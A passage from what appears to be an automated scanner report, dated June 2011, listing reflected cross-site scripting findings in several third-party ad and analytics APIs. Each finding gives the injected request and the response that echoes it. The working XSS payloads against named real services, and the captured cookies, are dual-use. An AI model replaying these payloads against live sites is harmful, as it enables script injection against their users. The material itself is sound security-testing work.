User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe3KZNYajTv8WFExkNK7HUtFp4B4dlWpgdjompglDEY6Fz8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvaVisNuwTZJ71H7ipM0dUEU19JRFsRyXovJE93rVCVYWJZWr1XIQIIGVSLisisBipGPv3ipBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 13 Jun 2011 11:26:06 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 92
Connection: keep-alive

Unknown API key: (bbe168f7d7bf46369bbe29684c749a27910f3<script>alert(1)</script>239728372ad)

4.62. http://api.bizographics.com/v1/profile.redirect [callback_url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 9ef78<script>alert(1)</script>834499b1128 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?callback_url=9ef78<script>alert(1)</script>834499b1128&api_key=bbe168f7d7bf46369bbe29684c749a27 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe3KZNYajTv8WFExkNK7HUtFp4B4dlWpgdjompglDEY6Fz8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvaVisNuwTZJ71H7ipM0dUEU19JRFsRyXovJE93rVCVYWJZWr1XIQIIGVSLisisBipGPv3ipBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 13 Jun 2011 11:26:03 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: 9ef78<script>alert(1)</script>834499b1128

4.63. http://api.dimestore.com/viapi [id parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://api.dimestore.com
Path:	/viapi

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload fca9f<a>6d3fd3426f0 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /viapi?action=pixel&id=a51773776fca9f<a>6d3fd3426f0 HTTP/1.1
Host: api.dimestore.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MSR/iview/313679802/direct;wi.160;hi.600/01/6942356?click=http://n4403ad.doubleclick.net/click%3Bh%3Dv8/3b25/3/0/%2a/h%3B240399958%3B0-0%3B0%3B39168450%3B2321-160/600%3B41978481/41996268/1%3B%3B%7Eokv%3D%3Bsect%3Dros%3Bsz%3D160x600%3Btile%3D4%3B%7Eaopt%3D2/1/83/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Mon, 13 Jun 2011 11:23:33 GMT
Content-Type: text/xml
Connection: keep-alive
Set-Cookie: pixel_a51773776fca9f<a>6d3fd3426f0=1; Expires=Tue, 12-Jun-2012 11:23:33 GMT
Content-Length: 55

// DIMESTORE PIXEL OK -- a51773776fca9f<a>6d3fd3426f0

4.64. http://api.mixpanel.com/track/ [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.mixpanel.com
Path:	/track/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ea105<script>alert(1)</script>760dc7e2979 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /track/?data=eyJldmVudCI6ICJtcF9wYWdlX3ZpZXciLCJwcm9wZXJ0aWVzIjogeyJtcF9yZWZlcnJlciI6ICJodHRwOi8vd3d3Lm1hdnNtb25leWJhbGwuY29tL21hdmVyaWNrcy10aWNrZXRzIiwibXBfYnJvd3NlciI6ICJDaHJvbWUiLCJtcF9wbGF0Zm9ybSI6ICJXaW5kb3dzIiwibXBfcGFnZSI6ICJodHRwOi8vd3d3LnRpcWlxLmNvbS9UaXFpcS9QdWJsaXNoZXJIb21lUGFnZS5hc3B4P1BlcmZvcm1lcklkcz01MTM7SW5jbEF3YXlHYW1lcyZQdWJsaXNoZXJJRD0xMDExMDMxJkJyYW5kSUQ9RW1wdHkmRXZlbnRDb3VudD01IiwidG9rZW4iOiAiY2QwYTRlMWZkOGQ5ZDIyYTg0NjMwY2IyODBkMjU5MzkiLCJ0aW1lIjogMTMwNzk2MzY1NH19&ip=1&callback=mpq.metrics.jsonp_callbackea105<script>alert(1)</script>760dc7e2979&_=1307963654720 HTTP/1.1
Host: api.mixpanel.com
Proxy-Connection: keep-alive
Referer: http://www.tiqiq.com/Tiqiq/PublisherHomePage.aspx?PerformerIds=513;InclAwayGames&PublisherID=1011031&BrandID=Empty&EventCount=5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 13 Jun 2011 11:22:15 GMT
Content-Type: text/javascript
Connection: close
Vary: Accept-Encoding
Expires: Mon, 13 Jun 2011 11:22:13 GMT
Access-Control-Max-Age: 1728000
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Allow-Headers: X-Requested-With
Content-Length: 71

mpq.metrics.jsonp_callbackea105<script>alert(1)</script>760dc7e2979(1);

4.65. http://ar.voicefive.com/b/rc.pli [func parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload dadcf<script>alert(1)</script>f22f0674cd3 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractiondadcf<script>alert(1)</script>f22f0674cd3&n=ar_int_p20101109&1307963612571 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://cas.ny.us.criteo.com/delivery/afr.php?zoneid=11794&bannerid=15313&did=e2781b91d4&rtb=6&z=A806B85E716068DA&b=_QvwWPOmF9qsK5gj17cW6Aw%253d%253d&u=|nNCLaCHwmN07U4DRUZ0pHdqixMoMjXJxX2u8Zm/PtPU=|&bi=|nNCLaCHwmN0J5w24FyGsdH++TaD0GtSWalTZURlH6HtA06wdvExd4w==|&rl=~02-D56D73BBE04E7C6C5FBFD05DE07AB42148F56B7C-1-1-1-1----499220b078520fd232c6c82d63fe5ed76e555f74~&ep=%7cnNCLaCHwmN35Kg6IthAYnOokjl6jAJDuWARTH7zdO09d4gvwAj4xCPeQctduIb%2fu%7c&c=JgKZmjcgVQ2W2rfCWnzvGF49VVUAC02887GqDp9AuJ4fvT1Q-IkeHtZuTAgKG5GXWKbQcBCiB0nIjB-bwwvoITNGelXJ6ciB2QssfATJuE8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1307963602%2E056%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:21:38 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractiondadcf<script>alert(1)</script>f22f0674cd3("");

4.66. http://as.jivox.com/player/iabplayer.php [clickTagURL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/iabplayer.php

Issue detail

The value of the clickTagURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 226ca"><script>alert(1)</script>5089f9eb91 was submitted in the clickTagURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com226ca"><script>alert(1)</script>5089f9eb91&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

4.67. http://as.jivox.com/player/jivox_ad_tags.php [adThumbnail parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the adThumbnail request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f4e5'%3balert(1)//1db1bc5fdae was submitted in the adThumbnail parameter. This input was echoed as 3f4e5';alert(1)//1db1bc5fdae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg3f4e5'%3balert(1)//1db1bc5fdae&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:04:00 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57690
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
<img src="http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg3f4e5';alert(1)//1db1bc5fdae" border="0" width="300" height="250" alt="" />
...[SNIP]...

4.68. http://as.jivox.com/player/jivox_ad_tags.php [adThumbnail parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the adThumbnail request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 561f6"-alert(1)-"9fdd048afed was submitted in the adThumbnail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg561f6"-alert(1)-"9fdd048afed&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:58 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57688
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
estartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg561f6"-alert(1)-"9fdd048afed&adVideoURL=&jvxSessionId=1307963038.2661");
jvxAdPlayer.setPlayerObjectId("jvxAdPlayer");
jvxAdPlayer.setPlayerObject(jvxAdPlayer);
jvxAdPlayer.render();
}

4.69. http://as.jivox.com/player/jivox_ad_tags.php [adVideoURL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the adVideoURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fef19"-alert(1)-"98015cf2c17 was submitted in the adVideoURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=fef19"-alert(1)-"98015cf2c17 HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:04:05 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
te=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=fef19"-alert(1)-"98015cf2c17&jvxSessionId=1307963045.8136");
jvxAdPlayer.setPlayerObjectId("jvxAdPlayer");
jvxAdPlayer.setPlayerObject(jvxAdPlayer);
jvxAdPlayer.render();
}

4.70. http://as.jivox.com/player/jivox_ad_tags.php [autoPlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://as.jivox.com
Path:	/player/jivox_ad_tags.php

Issue detail

The value of the autoPlay request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dd00"-alert(1)-"646a0cac324 was submitted in the autoPlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true1dd00"-alert(1)-"646a0cac324&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c90